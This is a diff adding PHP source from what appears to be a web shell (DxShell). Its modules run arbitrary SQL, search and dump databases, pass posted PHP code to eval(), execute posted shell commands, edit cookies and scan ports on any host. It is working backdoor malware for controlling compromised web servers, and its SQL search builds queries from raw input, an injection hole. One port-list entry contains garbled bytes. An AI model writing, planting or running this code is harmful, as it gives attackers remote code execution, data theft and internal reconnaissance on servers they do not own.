+	foreach ($_POST['dxsql_q'] as $CUR_Q)
+		{		if (empty($CUR_Q)) continue;
+		$CUR_Q.=';';
+
+		$num=DxMySQL_FetchResult(DxMySQLQ($CUR_Q, true), $FETCHED, false);
+		if ($num<=0) continue;
+
+		print "\n\n\n".'<table border=0 cellspacing=0 cellpadding=0><caption>'.$CUR_Q.'</caption>';
+
+		$INDEXES=array_keys($FETCHED[0]);
+		print "\n\t".'<tr><td class="listing" colspan='.(count($INDEXES)+1).'>&gt;&gt; Fetched: '.$num. str_repeat('&nbsp;', 10). 'Affected: '.mysql_affected_rows().'</td></tr>';
+		print "\n\t".'<tr><td class="listing"><div align=center  class="highlight_txt">###</td>';
+		foreach ($INDEXES as $key) print '<td class="listing"><div align=center class="highlight_txt">'.$key.'</td>';
+		print '</tr>';
+
+		for ($l=0;$l<count($FETCHED);$l++)
+			{
+			print "\n\t".'<tr><td class="listing" width=40><div align=right class="highlight_txt">'.$l.'</td>';
+			for ($i=0; $i<count($INDEXES); $i++)
+				print '<td class="listing"> '.DxDecorVar($FETCHED[$l][ $INDEXES[$i] ], true).'</td>';
+			}
+
+		print "\n".'</table><br>';
+		}
+	print "\n".'</td></tr></table>';
+	}
+
+########
+########   SQL Search
+########
+if ($_GET['dxmode']=='SQLS')
+	{
+	if (!isset($_GET['dxsql_s'], $_GET['dxsql_l'], $_GET['dxsql_p'], $_GET['dxsql_d']))	die(DxError('SQL server/login/password/database are not set'));
+
+	if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0))
+		die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+		else print '&gt;&gt; MySQL connected!';
+
+	if (!mysql_select_db($_GET['dxsql_d']))
+		die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0><tr><td class=h2_oneline><h2>DB:</h2></td>';
+	print "\n".'<td class=linelisting><font class=highlight_txt>'.((empty($_GET['dxsql_d']))?'&lt;Server&gt;':$_GET['dxsql_d']).'</font></td></tr></table>';
+
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';	print "\n".'<table border=0 cellspacing=0 cellpadding=0 width=100%>';
+	print "\n".'<tr><td width=1% class=h2_oneline style="vertical-align:top;">';
+
+	DxMySQL_FetchResult(DxMySQLQ('SHOW TABLES;', true), $TABLES, true);
+	for ($i=0;$i<count($TABLES);$i++) $TABLES[$i]=$TABLES[$i][0];
+	asort($TABLES);
+
+	if (isset($_POST['dxsqlsearch']['txt']))
+		if (get_magic_quotes_gpc()==1) $_POST['dxsqlsearch']['txt']=stripslashes($_POST['dxsqlsearch']['txt']);
+
+	print "\n\t".'<SELECT MULTIPLE name="dxsqlsearch[tables][]" SIZE=30>';
+	for ($i=0;$i<count($TABLES);$i++)
+		{
+		DxMySQL_FetchResult(DxMySQLQ('SELECT COUNT(*) FROM `'.$TABLES[$i].'`;', true), $TRowCnt, true);
+		if ($TRowCnt[0][0]>0)
+			print "\n\t".'<OPTION value="'.$TABLES[$i].'" '
+				.(  (isset($_POST['dxsqlsearch']['tables']))?   ((in_array($TABLES[$i], $_POST['dxsqlsearch']['tables']))?'SELECTED':'')   :'SELECTED'  ).'>'
+				.$TABLES[$i].'</OPTION>';
+		}
+	print "\n\t".'</SELECT>';
+	print "\n".'</td><td  width=100%>';
+	print "\n".'<input type=text name="dxsqlsearch[txt]" style="width:100%;" value="'.((empty($_POST['dxsqlsearch']['txt']))?'':str_replace('"', '&quot;', $_POST['dxsqlsearch']['txt'])).'">';
+	print "\n".'<br>';
+	foreach (array('Any', 'Each', 'Exact', 'RegExp') as $cur_rad)
+		print '<input type=radio name="dxsqlsearch[mode]" value="'.strtolower($cur_rad).'" '
+			.(  (isset($_POST['dxsqlsearch']['mode']))?   (($_POST['dxsqlsearch']['mode']==strtolower($cur_rad))?'CHECKED':'')   :(($cur_rad=='Any')?'CHECKED':'')  )
+			.' class=radio>'.$cur_rad.'&nbsp;&nbsp;&nbsp;';
+	print "\n".'<div align=right><input type=submit value="Search..." class=submit style="width:100pt;"></div>';
+	print "\n".'</form>';
+
+	if (!isset($_POST['dxsqlsearch'])) die('</td></tr></table>');
+
+	if (empty($_POST['dxsqlsearch']['tables'])) die(DxError('No tables selected'));
+
+	if (in_array($_POST['dxsqlsearch']['mode'], array('any', 'each'))) $_POST['dxsqlsearch']['txt']=explode(' ', mysql_real_escape_string($_POST['dxsqlsearch']['txt']));
+		else $_POST['dxsqlsearch']['txt']=array($_POST['dxsqlsearch']['txt']);
+
+
+	$GLOBALFOUND=0;
+	foreach ($_POST['dxsqlsearch']['tables'] as $CUR_TABLE)
+		{		$Q='SELECT * FROM `'.$CUR_TABLE.'` WHERE ';
+		$Q_ARR=array();
+		DxMySQL_FetchResult(DxMySQLQ('SHOW COLUMNS FROM `'.$CUR_TABLE.'`;', true), $COLS, true);   for ($i=0; $i<count($COLS);$i++) $COLS[$i]=$COLS[$i][0];
+		foreach ($COLS as $CUR_COL)
+			{			if (in_array($_POST['dxsqlsearch']['mode'], array('any', 'each', 'exact')))
+				{				for ($i=0;$i<count($_POST['dxsqlsearch']['txt']);$i++)
+				$Q_ARR[]=$CUR_COL.' LIKE "%'.($_POST['dxsqlsearch']['txt'][$i]).'%"';
+				}
+				else $Q_ARR[]=$CUR_COL.' REGEXP '.$_POST['dxsqlsearch']['txt'][0];
+
+			if ($_POST['dxsqlsearch']['mode']=='each')
+				{				$Q_ARR_EXACT[]=implode(' AND ', $Q_ARR);
+				$Q_ARR=array();
+				}
+			}
+		if (in_array($_POST['dxsqlsearch']['mode'], array('any', 'exact'))) $Q.=implode(' OR ', $Q_ARR).';';
+		if ($_POST['dxsqlsearch']['mode']=='each') $Q.=' ( '.implode(' ) OR ( ', $Q_ARR_EXACT).' );';
+		if ($_POST['dxsqlsearch']['mode']=='regexp') $Q.=' ( '.implode(' ) OR ( ',$Q_ARR).' );';
+
+		/* $Q is ready */
+
+		if (($num=DxMySQL_FetchResult(DxMySQLQ($Q, true), $FETCHED, true))>0)
+			{
+			$GLOBALFOUND+=$num;			print "\n\n".'<table border=0 cellspacing=0 cellpadding=0 align=center><caption>'.$num.' matched in '.$CUR_TABLE.' :</caption>';
+			print "\n\t".'<tr><td class=listing><font class="highlight_txt">'.implode('</td><td class=listing><font class="highlight_txt">', $COLS).'</td></tr>';
+			for ($l=0;$l<count($FETCHED);$l++)
+				{
+				print "\n\t".'<tr>';
+				for ($i=0; $i<count($FETCHED[$l]); $i++) print '<td class="listing"> '.DxDecorVar($FETCHED[$l][$i], true).'</td>';
+				print '</tr>';
+				}
+			print "\n".'</table><br>';
+			}
+		}
+	print "\n".'<br>Total: '.$GLOBALFOUND.' matches';
+
+	print "\n".'</td></tr></table>';
+	}
+
+########
+########   SQL Dump
+########
+if ($_GET['dxmode']=='SQLD')
+	{	if (!isset($_GET['dxsql_s'], $_GET['dxsql_l'], $_GET['dxsql_p'], $_GET['dxsql_d']))	die(DxError('SQL server/login/password/database are not set'));
+
+	if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0))
+		die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+		else print '&gt;&gt; MySQL connected!';
+
+	if (!mysql_select_db($_GET['dxsql_d']))
+		die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0><tr><td class=h2_oneline><h2>DB:</h2></td>';
+	print "\n".'<td class=linelisting><font class=highlight_txt>'.((empty($_GET['dxsql_d']))?'&lt;Server&gt;':$_GET['dxsql_d']).'</font></td></tr></table>';
+
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0 width=100%>';
+	print "\n".'<tr><td width=1% class=h2_oneline style="vertical-align:top;">';
+
+	DxMySQL_FetchResult(DxMySQLQ('SHOW TABLES;', true), $TABLES, true);
+	for ($i=0;$i<count($TABLES);$i++) $TABLES[$i]=$TABLES[$i][0];
+	asort($TABLES);
+
+	print "\n\t".'<SELECT MULTIPLE name="dxsql_tables[]" SIZE=30>';
+	for ($i=0;$i<count($TABLES);$i++)
+		{
+		DxMySQL_FetchResult(DxMySQLQ('SELECT COUNT(*) FROM `'.$TABLES[$i].'`;', true), $TRowCnt, true);
+		if ($TRowCnt[0][0]>0)
+			print "\n\t".'<OPTION value="'.$TABLES[$i].'" SELECTED>'.$TABLES[$i].'</OPTION>';
+		}
+	print "\n\t".'</SELECT>';
+	print "\n".'</td><td  width=100%>You can set a pre-dump-query(s) (ex: SET NAMES cp1251; ):';
+	print "\n".'<input type=text name="dxsql_q" style="width:100%;">';
+	print "\n".'<br>';
+	print "\n".'<div align=right>'
+		.'GZIP <input type=checkbox name="dx_gzip" value="Yeah, baby">'.str_repeat('&nbsp;', 10)
+		.'<input type=submit value="Dump!" class=submit style="width:100pt;"></div>';
+	print "\n".'</form>';
+	}
+
+		###################################
+
+########
+########   PHP Console
+########
+if ($_GET['dxmode']=='PHP')
+	{
+	if (isset($_GET['dxval'])) $_POST['dxval']=$_GET['dxval'];
+
+	print "\n".'<table border=0 align=right><tr><td class=h2_oneline>Do</td><td class="linelisting">';
+	$PRESETS=array_keys($GLOB['VAR']['PHP']['Presets']);
+	for ($i=0; $i<count($PRESETS);$i++)
+		print "\n\t".'<a href="'.DxURL('leave', 'dxmode').'&dxval=dxpreset__'.$PRESETS[$i].'" class=no>['.$PRESETS[$i].']</a>'
+						.(  ($i==(count($PRESETS)-1))?'':str_repeat('&nbsp;',3)  );
+	print "\n\n".'</td></tr></table><br><br>';
+
+	if (isset($_POST['dxval']))
+		if (strpos($_POST['dxval'], 'dxpreset__')===0)
+			{			$_POST['dxval']=substr($_POST['dxval'], strlen('dxpreset__'));
+			if (!isset($GLOB['VAR']['PHP']['Presets'][$_POST['dxval']])) die(DxError('Undeclared preset'));
+			$_POST['dxval']=$GLOB['VAR']['PHP']['Presets'][$_POST['dxval']];
+			}
+
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<textarea name="dxval" rows=15 style="width:100%;">'.((isset($_POST['dxval']))?$_POST['dxval']:'').'</textarea>';
+	print "\n".'<div align=right><input type=submit value="Eval" class="submit" style="width:200pt;"></div>';
+	print "\n".'</form>';
+	if (isset($_POST['dxval']))
+		{		print str_repeat("\n", 10).'<!--php_eval-->'."\n\n".'<table border=0 width=100%><tr><td class=listing>'."\n\n";
+		eval($_POST['dxval']);
+		print str_repeat("\n", 10).'<!--/php_eval-->'.'</td></tr></table>';
+		}
+	}
+
+		###################################
+
+########
+########  Cookies Maintenance
+########
+if ($_GET['dxmode']=='COOK')
+	{
+	if ($DXGLOBALSHIT) DxWarning('Set cookie may fail. This is because "'.basename($_SERVER['PHP_SELF']).'" has fucked up the output with it\'s shit =(');	print 'Found <font class="highlight_txt">'.($CNT=count($_COOKIE)).' cookie'.(($CNT==1)?'':'s');
+
+	print "\n".'<div align=right><a href="'.DxURL('leave', '').'">[RELOAD]</a></div>';
+
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<table border=0 align=center><tr><td class=linelisting><div align=center><font class="highlight_txt">Cookie name</td><td class=linelisting><div align=center><font class="highlight_txt">Value</td></tr>';
+	for ($look_len=1, $maxlen=0; $look_len>=0;$look_len--)
+		{
+		if ($maxlen>100) $maxlen=100;
+		if ($maxlen<30) $maxlen=30;
+		$maxlen+=3;
+		for ($INDEXES=array_keys($_COOKIE), $i=0;$i<count($INDEXES);$i++)
+			{
+			if ($look_len) {if (strlen($_COOKIE[ $INDEXES[$i] ])>$maxlen) {$maxlen=strlen($_COOKIE[ $INDEXES[$i] ]);} continue;}
+			print "\n".'<tr><td class=linelisting>'.$INDEXES[$i].'</td>'
+					.'<td class=linelisting><input type=text '
+							.'name="dxparam['.str_replace(array('"', "\n", "\r", "\t"),  array('&quot;',' ',' ',' '), $INDEXES[$i]).']" '
+							.'value="'.str_replace(array('"', "\n", "\r", "\t"), array('&quot;',' ',' ',' '), $_COOKIE[ $INDEXES[$i] ]).'" '
+							.'SIZE='.$maxlen.'></td>'
+					.'</tr>';
+			}
+		if (!$look_len)
+			{
+			print "\n".'<tr><td colspan=2><div align=center>[Set new cookie]</td></tr>';
+			print "\n".'<tr><td class=linelisting><input type=text name="dxparam[DXS_NEWCOOK][NAM]" value="" style="width:99%;"></td>'
+					.'<td class=linelisting><input type=text name="dxparam[DXS_NEWCOOK][VAL]" value="" SIZE='.$maxlen.'></td>'
+					.'</tr>';			print "\n".'<tr><td class=linelisting colspan=2 style="text-align:center;">'
+					.'<input type=submit value="Save" class="submit" style="width:50%;">'
+					.'</td></tr>';
+			}
+		}
+	print "\n".'</table></form>';
+	}
+
+		###################################
+
+########
+########   Command line
+########
+if ($_GET['dxmode']=='CMD')
+	{
+	print "\n".'<table border=0 align=right><tr><td class=h2_oneline>Do</td><td>';
+	print "\n".'<SELECT name="selector" onchange="document.getElementById(\'dxval\').value+=document.getElementById(\'selector\').value+\'\n\'" style="width:200pt;">';
+	print "\n\t".'<OPTION></OPTION>';
+	$PRESETS=array_keys($GLOB['VAR']['CMD']['Presets']);
+	for ($i=0; $i<count($PRESETS);$i++)
+		print "\n\t".'<OPTION value="'.str_replace('"','&quot;',$GLOB['VAR']['CMD']['Presets'][ $PRESETS[$i] ]).'">'.$PRESETS[$i].'</OPTION>';
+	print "\n\n".'</SELECT></td></tr></table><br><br>';
+
+	if (isset($_POST['dxval']))
+		if (strpos($_POST['dxval'], 'dxpreset__')===0)
+			{
+			$_POST['dxval']=substr($_POST['dxval'], strlen('dxpreset__'));
+			if (!isset($GLOB['VAR']['CMD']['Presets'][$_POST['dxval']])) die(DxError('Undeclared preset'));
+			$_POST['dxval']=$GLOB['VAR']['CMD']['Presets'][$_POST['dxval']];
+			}
+
+	$warnstr=DxExecNahuj('',$trash1, $trash2);
+	if (!$warnstr[1]) DxWarning($warnstr[2]);
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<textarea name="dxval" rows=5 style="width:100%;">'.((isset($_POST['dxval']))?$_POST['dxval']:'').'</textarea>';
+	print "\n".'<div align=right>'
+				.'<input type=submit value="Exec" class="submit" style="width:100pt;"> '
+				.'</div>';
+	print "\n".'</form>';
+	if (isset($_POST['dxval']))
+		{
+		$_POST['dxval']=split("\n", str_replace("\r", '', $_POST['dxval']));
+		for ($i=0; $i<count($_POST['dxval']); $i++)
+			{
+			$CUR=$_POST['dxval'][$i];
+			if (empty($CUR)) continue;
+
+			DxExecNahuj($CUR,$OUT, $RET);
+			print str_repeat("\n", 10).'<!--'.$warnstr[2].'("'.$CUR.'")-->'."\n\n".'<table border=0 width=100%><tr><td class=listing>'."\n\n";
+
+			print '<span style="position:absolute;left:10%;" class="highlight_txt">Return</span>';
+			print '<span style="position:absolute;right:30%;" class="highlight_txt">Output</span>';
+			print '<br><nobr>';
+			print "\n".'<textarea rows=10 style="width:20%;display:inline;">'.$CUR."\n\n".(	(is_array($RET))?implode("\n", $RET):$RET).'</textarea>';
+			print "\n".'<textarea rows=10 style="width:79%;display:inline;">'."\n".(	(is_array($OUT))?implode("\n", $OUT):$OUT).'</textarea>';
+			print '</nobr>';
+			print str_repeat("\n", 10).'<!--/'.$warnstr[2].'("'.$CUR.'")-->'."\n\n".'</td></tr></table>';
+			}
+		}
+	}
+
+		###################################
+
+########
+########   String functions
+########
+if ($_GET['dxmode']=='STR')
+	{
+	if (isset($_POST['dxval'], $_POST['dxparam']))
+		{		$crypted='';
+		if ($_POST['dxparam']=='md5') $crypted.=md5($_POST['dxval']);
+		if ($_POST['dxparam']=='sha1') $crypted.=sha1($_POST['dxval']);
+		if ($_POST['dxparam']=='crc32') $crypted.=crc32($_POST['dxval']);
+		if ($_POST['dxparam']=='2base') $crypted.=base64_encode($_POST['dxval']);
+		if ($_POST['dxparam']=='base2') $crypted.=base64_decode($_POST['dxval']);
+		if ($_POST['dxparam']=='2HEX') for ($i=0;$i<strlen($_POST['dxval']);$i++) $crypted.=strtoupper(dechex(ord($_POST['dxval'][$i]))).' ';
+		if ($_POST['dxparam']=='HEX2') {$_POST['dxval']=str_replace(' ','',$_POST['dxval']); for ($i=0;$i<strlen($_POST['dxval']);$i+=2) $crypted.=chr(hexdec($_POST['dxval'][$i].$_POST['dxval'][$i+1]));}
+		if ($_POST['dxparam']=='2DEC') {$crypted='CHAR('; for ($i=0;$i<strlen($_POST['dxval']); $i++) $crypted.=ord($_POST['dxval'][$i]).(($i<(strlen($_POST['dxval'])-1))?',':')');}
+		if ($_POST['dxparam']=='2URL') $crypted.=urlencode($_POST['dxval']);
+		if ($_POST['dxparam']=='URL2') $crypted.=urldecode($_POST['dxval']);
+		}
+	if (isset($crypted)) print $_POST['dxparam'].'(<font class="highlight_txt"> '.$_POST['dxval'].' </font>) = ';
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<textarea name="dxval" rows=20 style="width:100%;">'.((isset($crypted))?$crypted:'').'</textarea>';
+	print "\n".'<div align=right>'
+		.'<input type=submit name="dxparam" value="md5" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="sha1" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="crc32" class="submit" style="width:50pt;"> '.str_repeat('&nbsp;', 5)
+		.'<input type=submit name="dxparam" value="2base" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="base2" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="2HEX" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="HEX2" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="2DEC" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="2URL" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="URL2" class="submit" style="width:50pt;"> '
+		.'</div>';
+	print "\n".'</form>';
+	}
+
+########
+########   Port scaner
+########
+if ($_GET['dxmode']=='PRT')
+	{
+	print '[!] For complete portlist go to <a href="http://www.iana.org/assignments/port-numbers" target=_blank>http://www.iana.org/assignments/port-numbers</a>';
+	if (isset($_POST['dxportscan']) or isset($_GET['dxparam']))
+		$DEF_PORTS=array (1=>'tcpmux (TCP Port Service Multiplexer)',2=>'Management Utility',3=>'Compression Process',5=>'rje (Remote Job Entry)',7=>'echo',9=>'discard',11=>'systat',13=>'daytime',15=>'netstat',17=>'quote of the day',18=>'send/rwp',19=>'character generator',20=>'ftp-data',21=>'ftp',22=>'ssh, pcAnywhere',23=>'Telnet',25=>'SMTP (Simple Mail Transfer)',27=>'ETRN (NSW User System FE)',29=>'MSG ICP',31=>'MSG Authentication',33=>'dsp (Display Support Protocol)',37=>'time',38=>'RAP (Route Access Protocol)',39=>'rlp (Resource Location Protocol)',41=>'Graphics',42=>'nameserv, WINS',43=>'whois, nickname',44=>'MPM FLAGS Protocol',45=>'Message Processing Module [recv]',46=>'MPM [default send]',47=>'NI FTP',48=>'Digital Audit Daemon',49=>'TACACS, Login Host Protocol',50=>'RMCP, re-mail-ck',53=>'DNS',57=>'MTP (any private terminal access)',59=>'NFILE',60=>'Unassigned',61=>'NI MAIL',62=>'ACA Services',63=>'whois++',64=>'Communications Integrator (CI)',65=>'TACACS-Database Service',66=>'Oracle SQL*NET',67=>'bootps (Bootstrap Protocol Server)',68=>'bootpd/dhcp (Bootstrap Protocol Client)',69=>'Trivial File Transfer Protocol (tftp)',70=>'Gopher',71=>'Remote Job Service',72=>'Remote Job Service',73=>'Remote Job Service',74=>'Remote Job Service',75=>'any private dial out service',76=>'Distributed External Object Store',77=>'any private RJE service',78=>'vettcp',79=>'finger',80=>'World Wide Web HTTP',81=>'HOSTS2 Name Serve',82=>'XFER Utility',83=>'MIT ML Device',84=>'Common Trace Facility',85=>'MIT ML Device',86=>'Micro Focus Cobol',87=>'any private terminal link',88=>'Kerberos, WWW',89=>'SU/MIT Telnet Gateway',90=>'DNSIX Securit Attribute Token Map',91=>'MIT Dover Spooler',92=>'Network Printing Protocol',93=>'Device Control Protocol',94=>'Tivoli Object Dispatcher',95=>'supdup',96=>'DIXIE',98=>'linuxconf',99=>'Metagram Relay',100=>'[unauthorized use]',101=>'HOSTNAME',102=>'ISO, X.400, ITOT',103=>'Genesis Point-to&#14144;&#429;oi&#65535;&#65535; T&#0;&#0;ns&#0;&#0;et',104=>'ACR-NEMA Digital Imag. & Comm. 300',105=>'CCSO name server protocol',106=>'poppassd',107=>'Remote Telnet Service',108=>'SNA Gateway Access Server',109=>'POP2',110=>'POP3',111=>'Sun RPC Portmapper',112=>'McIDAS Data Transmission Protocol',113=>'Authentication Service',115=>'sftp (Simple File Transfer Protocol)',116=>'ANSA REX Notify',117=>'UUCP Path Service',118=>'SQL Services',119=>'NNTP',120=>'CFDP',123=>'NTP',124=>'SecureID',129=>'PWDGEN',133=>'statsrv',135=>'loc-srv/epmap',137=>'netbios-ns',138=>'netbios-dgm (UDP)',139=>'NetBIOS',143=>'IMAP',144=>'NewS',150=>'SQL-NET',152=>'BFTP',153=>'SGMP',156=>'SQL Service',161=>'SNMP',175=>'vmnet',177=>'XDMCP',178=>'NextStep Window Server',179=>'BGP',180=>'SLmail admin',199=>'smux',210=>'Z39.50',213=>'IPX',218=>'MPP',220=>'IMAP3',256=>'RAP',257=>'Secure Electronic Transaction',258=>'Yak Winsock Personal Chat',259=>'ESRO',264=>'FW1_topo',311=>'Apple WebAdmin',350=>'MATIP type A',351=>'MATIP type B',363=>'RSVP tunnel',366=>'ODMR (On-Demand Mail Relay)',371=>'Clearcase',387=>'AURP (AppleTalk Update-Based Routing Protocol)',389=>'LDAP',407=>'Timbuktu',427=>'Server Location',434=>'Mobile IP',443=>'ssl',444=>'snpp, Simple Network Paging Protocol',445=>'SMB',458=>'QuickTime TV/Conferencing',468=>'Photuris',475=>'tcpnethaspsrv',500=>'ISAKMP, pluto',511=>'mynet-as',512=>'biff, rexec',513=>'who, rlogin',514=>'syslog, rsh',515=>'lp, lpr, line printer',517=>'talk',520=>'RIP (Routing Information Protocol)',521=>'RIPng',522=>'ULS',531=>'IRC',543=>'KLogin, AppleShare over IP',545=>'QuickTime',548=>'AFP',554=>'Real Time Streaming Protocol',555=>'phAse Zero',563=>'NNTP over SSL',575=>'VEMMI',581=>'Bundle Discovery Protocol',593=>'MS-RPC',608=>'SIFT/UFT',626=>'Apple ASIA',631=>'IPP (Internet Printing Protocol)',635=>'RLZ DBase',636=>'sldap',642=>'EMSD',648=>'RRP (NSI Registry Registrar Protocol)',655=>'tinc',660=>'Apple MacOS Server Admin',666=>'Doom',674=>'ACAP',687=>'AppleShare IP Registry',700=>'buddyphone',705=>'AgentX for SNMP',901=>'swat, realsecure',993=>'s-imap',995=>'s-pop',1024=>'Reserved',1025=>'network blackjack',1062=>'Veracity',1080=>'SOCKS',1085=>'WebObjects',1227=>'DNS2Go',1243=>'SubSeven',1338=>'Millennium Worm',1352=>'Lotus Notes',1381=>'Apple Network License Manager',1417=>'Timbuktu Service 1 Port',1418=>'Timbuktu Service 2 Port',1419=>'Timbuktu Service 3 Port',1420=>'Timbuktu Service 4 Port',1433=>'Microsoft SQL Server',1434=>'Microsoft SQL Monitor',1477=>'ms-sna-server',1478=>'ms-sna-base',1490=>'insitu-conf',1494=>'Citrix ICA Protocol',1498=>'Watcom-SQL',1500=>'VLSI License Manager',1503=>'T.120',1521=>'Oracle SQL',1522=>'Ricardo North America License Manager',1524=>'ingres',1525=>'prospero',1526=>'prospero',1527=>'tlisrv',1529=>'oracle',1547=>'laplink',1604=>'Citrix ICA, MS Terminal Server',1645=>'RADIUS Authentication',1646=>'RADIUS Accounting',1680=>'Carbon Copy',1701=>'L2TP/LSF',1717=>'Convoy',1720=>'H.323/Q.931',1723=>'PPTP control port',1731=>'MSICCP',1755=>'Windows Media .asf',1758=>'TFTP multicast',1761=>'cft-0',1762=>'cft-1',1763=>'cft-2',1764=>'cft-3',1765=>'cft-4',1766=>'cft-5',1767=>'cft-6',1808=>'Oracle-VP2',1812=>'RADIUS server',1813=>'RADIUS accounting',1818=>'ETFTP',1973=>'DLSw DCAP/DRAP',1985=>'HSRP',1999=>'Cisco AUTH',2001=>'glimpse',2049=>'NFS',2064=>'distributed.net',2065=>'DLSw',2066=>'DLSw',2106=>'MZAP',2140=>'DeepThroat',2301=>'Compaq Insight Management Web Agents',2327=>'Netscape Conference',2336=>'Apple UG Control',2427=>'MGCP gateway',2504=>'WLBS',2535=>'MADCAP',2543=>'sip',2592=>'netrek',2727=>'MGCP call agent',2628=>'DICT',2998=>'ISS Real Secure Console Service Port',3000=>'Firstclass',3001=>'Redwood Broker',3031=>'Apple AgentVU',3128=>'squid',3130=>'ICP',3150=>'DeepThroat',3264=>'ccmail',3283=>'Apple NetAssitant',3288=>'COPS',3305=>'ODETTE',3306=>'mySQL',3389=>'RDP Protocol (Terminal Server)',3521=>'netrek',4000=>'icq, command-n-conquer and shell nfm',4321=>'rwhois',4333=>'mSQL',4444=>'KRB524',4827=>'HTCP',5002=>'radio free ethernet',5004=>'RTP',5005=>'RTP',5010=>'Yahoo! Messenger',5050=>'multimedia conference control tool',5060=>'SIP',5150=>'Ascend Tunnel Management Protocol',5190=>'AIM',5500=>'securid',5501=>'securidprop',5423=>'Apple VirtualUser',5555=>'Personal Agent',5631=>'PCAnywhere data',5632=>'PCAnywhere',5678=>'Remote Replication Agent Connection',5800=>'VNC',5801=>'VNC',5900=>'VNC',5901=>'VNC',6000=>'X Windows',6112=>'BattleNet',6502=>'Netscape Conference',6667=>'IRC',6670=>'VocalTec Internet Phone, DeepThroat',6699=>'napster',6776=>'Sub7',6970=>'RTP',7007=>'MSBD, Windows Media encoder',7070=>'RealServer/QuickTime',7777=>'cbt',7778=>'Unreal',7648=>'CU-SeeMe',7649=>'CU-SeeMe',8000=>'iRDMI/Shoutcast Server',8010=>'WinGate 2.1',8080=>'HTTP',8181=>'HTTP',8383=>'IMail WWW',8875=>'napster',8888=>'napster',8889=>'Desktop Data TCP 1',8890=>'Desktop Data TCP 2',8891=>'Desktop Data TCP 3: NESS application',8892=>'Desktop Data TCP 4: FARM product',8893=>'Desktop Data TCP 5: NewsEDGE/Web application',8894=>'Desktop Data TCP 6: COAL application',9000=>'CSlistener',10008=>'cheese worm',11371=>'PGP 5 Keyserver',13223=>'PowWow',13224=>'PowWow',14237=>'Palm',14238=>'Palm',18888=>'LiquidAudio',21157=>'Activision',22555=>'Vocaltec Web Conference',23213=>'PowWow',23214=>'PowWow',23456=>'EvilFTP',26000=>'Quake',27001=>'QuakeWorld',27010=>'Half-Life',27015=>'Half-Life',27960=>'QuakeIII',30029=>'AOL Admin',31337=>'Back Orifice',32777=>'rpc.walld',45000=>'Cisco NetRanger postofficed',32773=>'rpc bserverd',32776=>'rpc.spray',32779=>'rpc.cmsd',38036=>'timestep',40193=>'Novell',41524=>'arcserve discovery',);
+
+	if (isset($_GET['dxparam']))
+		{		print "\n".'<table><tr><td class=listing colspan=2><h2>#Scan main will scan these '.count($DEF_PORTS).' ports:</td></tr>';
+		$INDEXES=array_keys($DEF_PORTS);
+		for ($i=0;$i<count($INDEXES);$i++)
+			print "\n".'<tr><td width=40 class=listing style="text-align:right;">'.$INDEXES[$i].'</td><td class=listing>'.$DEF_PORTS[ $INDEXES[$i] ].'</td></tr>';
+		print "\n".'</table>';
+		die();
+		}
+
+	if (isset($_POST['dxportscan']))
+		{		$OKAY_PORTS = 0;
+		$TOSCAN=array();
+
+		if ($_POST['dxportscan']['ports']=='#default') $TOSCAN=array_keys($DEF_PORTS);
+			else
+			{			$_POST['dxportscan']['ports']=explode(',',$_POST['dxportscan']['ports']);
+			for ($i=0;$i<count($_POST['dxportscan']['ports']);$i++)
+				{				$_POST['dxportscan']['ports'][$i]=explode('-',$_POST['dxportscan']['ports'][$i]);
+				if (count($_POST['dxportscan']['ports'][$i])==1) $TOSCAN[]=$_POST['dxportscan']['ports'][$i][0];
+					else
+					$TOSCAN+=range($_POST['dxportscan']['ports'][$i][0], $_POST['dxportscan']['ports'][$i][1]);
+				$_POST['dxportscan']['ports'][$i]=implode('-', $_POST['dxportscan']['ports'][$i]);
+				}
+			$_POST['dxportscan']['ports']=implode(',',$_POST['dxportscan']['ports']);
+			}
+
+		print "\n".'<table><tr><td colspan=2><font class="highlight_txt">Opened ports:</td></tr>';
+		list($usec, $sec) = explode(' ', microtime());
+		$start=(float)$usec + (float)$sec;
+		for ($i=0;$i<count($TOSCAN);$i++)
+			{			$cur_port=&$TOSCAN[$i];
+			$fp=@fsockopen($_POST['dxportscan']['host'], $cur_port, $e, $e, (float)$_POST['dxportscan']['timeout']);
+			if ($fp)
+				{				$OKAY_PORTS++;
+				$port_name='';
+				if (isset($DEF_PORTS[$cur_port])) $port_name=$DEF_PORTS[$cur_port];
+				print "\n".'<tr><td width=50 class=listing style="text-align:right;">'.$cur_port.'</td><td class=listing>'.$port_name.'</td><td class=listing>'.getservbyport($cur_port, 'tcp').'</td></tr>';
+				}
+			}
+		list($usec, $sec) = explode(' ', microtime());
+		$end=(float)$usec + (float)$sec;
+
+		print "\n".'</table>';
+		print "\n".'<font class="highlight_txt">Scanned '.count($TOSCAN).', '.$OKAY_PORTS.' opened. Time: '.($end-$start).'</font>';
+		print "\n".'<br><hr>'."\n";
+		}
+
